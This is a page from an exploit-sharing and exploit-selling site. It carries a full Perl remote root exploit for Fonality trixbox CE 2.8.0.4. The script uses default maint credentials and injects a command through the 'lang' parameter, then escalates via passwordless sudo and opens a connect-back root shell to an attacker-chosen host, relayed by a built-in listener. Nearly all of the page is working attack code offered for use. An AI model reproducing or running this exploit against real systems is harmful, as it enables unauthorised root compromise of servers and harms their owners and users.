0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Fonality Trixbox CE 2.8.0.4 Command Execution Vulnerability
#!/usr/bin/perl # # Title: Fonality trixbox CE remote root exploit # Author: Simo Ben youssef # Contact: Simo_at_Morxploit_com # Discovered & Coded: 2 June 2014 # Published: 17 October 2014 # MorXploit Research # http://www.MorXploit.com # Software: trixbox CE # Version: trixbox-2.8.0.4.iso # Vendor url: http://www.fonality.com/ # Download: http://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/ # Vulnerable file: maint/modules/home/index.php # # Description: # maint/modules/home/index.php suffers from a command execution vulnerability, allowing an authenticated user to inject commands as the # asterisk user which then can be leverged to root privilege through sudo. # # from /etc/sudoers: ## asterisk ALL = NOPASSWD: /bin/bash # # Vulnerable code: # Line 68: $tbLang = $_GET['lang']; # Line 339: shell_exec $phpOutput = shell_exec('php -q libs/status.php ' . $tbLang); # # Note: # We did a full audit of Fonality trixbox CE 2.8.0.4 and we found several similar vulnerabilities (File disclosure, command/code execution etc). # We didn't think it was necessary to cover all the findings since support for the CE edition has been discontinued # but anyone who thinks about installing this should think twice. # # Download: # http://www.morxploit.com/morxploits/morxtrix.pl # # Demo: # perl trixbox.pl http://10.0.0.16 10.0.0.2 1111 # # =================================================== # --- Fonality trixbox remote root exploit # --- By: Simo Ben youssef <simo_at_morxploit_com> # --- MorXploit Research www.MorXploit.com # =================================================== # [*] MorXploiting http://10.0.0.16/maint/modules/home/index.php # [+] Sent payload! Waiting for connect back root shell ... # [+] Et voila you are in! # # Linux trixbox1.localdomain 2.6.18-164.11.1.el5 #1 SMP Wed Jan 20 07:39:04 EST 2010 i686 i686 i386 GNU/Linux # uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) # # Requires LWP::UserAgent # apt-get install libwww-perl # yum install libwww-perl # perl -MCPAN -e 'install Bundle::LWP' # For SSL support: # apt-get install liblwp-protocol-https-perl # yum install perl-Crypt-SSLeay # # Author disclaimer: # The information contained in this entire document is for educational, demonstration and testing purposes only. # Author cannot be held responsible for any malicious use or damage. Use at your own risk. use LWP::UserAgent; use MIME::Base64; use IO::Socket; use strict; sub banner { system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "===================================================\n"; print "--- Fonality trixbox CE remote root exploit\n"; print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n"; print "--- MorXploit Research www.MorXploit.com\n"; print "===================================================\n"; } if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2])) { banner(); print "perl $0 <target> <connectbackIP> <connectbackport>\n"; print "perl $0 http://10.0.0.16 10.0.0.2 31337\n"; exit; } my $host = $ARGV[0]; my $vuln = "maint/modules/home/index.php"; my $cbhost = $ARGV[1]; my $cbport = $ARGV[2]; my $defuser = "maint"; # Default maint user my $defpass = "password"; # Default maint pass my $string = "$defuser:$defpass"; my $encoded = encode_base64($string); $| = 1; $SIG{CHLD} = 'IGNORE'; my $l_sock = IO::Socket::INET->new( Proto => "tcp", LocalPort => "$cbport", Listen => 1, LocalAddr => "0.0.0.0", Reuse => 1, ) or die "[-] Could not listen on $cbport: $!\n"; sub randomagent { my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' ); my $random = $array[rand @array]; return($random); } my $useragent = randomagent(); my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua->timeout(10); $ua->agent($useragent); my $status = $ua->get("$host/$vuln", Authorization => "Basic $encoded"); unless ($status->is_success) { banner(); print "[-] Error: " . $status->status_line . "\n"; exit; } banner(); print "[*] MorXploiting $host/$vuln\n"; #my $payload = "sudo /bin/bash -i >%26 /dev/tcp/$cbhost/$cbport 0>%261"; # Bash connect back my $payload = "sudo /bin/bash -c \"perl -e '\\\$p=fork;exit,if(\\\$p); use Socket; use FileHandle; my \\\$system = \\\"/bin/sh\\\"; my \\\$host = \\\"$cbhost\\\"; my \\\$port = \\\"$cbport\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\"tcp\\\")); connect(SOCKET, sockaddr_in(\\\$port, inet_aton(\\\$host))); SOCKET->autoflush(); open(STDIN, \\\">%26SOCKET\\\"); open(STDOUT,\\\">%26SOCKET\\\"); open(STDERR,\\\">%26SOCKET\\\"); print \\\"[%2b] Et voila you are in!\\\\n\\\\n\\\"; system(\\\"uname -a;id\\\"); system(\\\$system);'\""; my $exploit = $ua->get("$host/$vuln?lang=;$payload", Authorization => "Basic $encoded"); print "[+] Sent payload! Waiting for connect back root shell ...\n"; my $a_sock = $l_sock->accept(); $l_sock->shutdown(SHUT_RDWR); copy_data_bidi($a_sock); sub copy_data_bidi { my ($socket) = @_; my $child_pid = fork(); if (! $child_pid) { close(STDIN); copy_data_mono($socket, *STDOUT); $socket->shutdown(SHUT_RD); exit(); } else { close(STDOUT); copy_data_mono(*STDIN, $socket); $socket->shutdown(SHUT_WR); kill("TERM", $child_pid); } } sub copy_data_mono { my ($src, $dst) = @_; my $buf; while (my $read_len = sysread($src, $buf, 4096)) { my $write_len = $read_len; while ($write_len) { my $written_len = syswrite($dst, $buf); return unless $written_len; $write_len -= $written_len; } } } # 0day.today [2024-12-25] #